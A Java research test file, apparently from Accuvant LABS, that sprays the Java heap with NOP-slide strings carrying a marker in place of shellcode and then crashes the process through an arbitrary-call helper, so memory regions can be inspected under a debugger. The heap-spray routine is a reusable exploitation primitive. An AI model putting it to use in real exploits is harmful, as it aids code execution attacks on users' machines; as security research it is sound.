/*
 * Heap Spray test App
 *
 * Allocate a java object in the java object heap and populate it with a unique 
 * string. By running this app under a debugger, we can search for all 
 * references to the unique string. Once found, we can examine the properties
 * of the associated memory region.
 *
 * This is inteded to be used with sprayheap.bat, sprayheap.wdbg
 *
 * Joshua J. Drake of Accuvant LABS
 */

public class SprayHeap
{
	//
	// This method is from the 2008 Dowd & Sotirov Browser paper
	//
	// Fill mb megabytes of heap memory with strings containing shellcode
	//
	public static void heapSpray(String shellcode, int mb) throws RuntimeException {
		// Limit the shellcode length to 100KB
		if (shellcode.length() > 100*1024)
			throw new RuntimeException();

		// Limit the heap spray size to 1GB, even though in practice the Java
		// heap for an applet is limited to 100MB
		if (mb > 1024)
			throw new RuntimeException();

		// Array of strings containing shellcode
		String[] mem = new String[1024];

		// A buffer for the nop slide and shellcode
		StringBuffer buffer = new StringBuffer(1024*1024/2);

		// Each string takes up exactly 1MB of space
		//
		// header    nop slide   shellcode  NULL
		// 12 bytes  1MB-12-2-x  x bytes    2 bytes
		// Build a nop slide
		for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++)
			buffer.append('\u9090');

		// Append the shellcode
		buffer.append(shellcode);

		// Run the garbage collector
		Runtime.getRuntime().gc();

		// Fill the heap with copies of the string
		try {
			for (int i=0; i<mb; i++) {
				mem[i] = buffer.toString();
			}
		}
		catch (OutOfMemoryError err) {
			// do nothing
		}
	}

	public static void main(String[] argv)
	{
		String strMarker = "";
		Vuln v = new Vuln();

		strMarker += "\ucc90";
		strMarker += "\ubeef";

		// this should create some memory that is RWX
		heapSpray(strMarker, 1);
		System.out.println("Sprayed!");

		// just used to crash the process
		v.ArbCall(0xdeadbeef);
	}
}
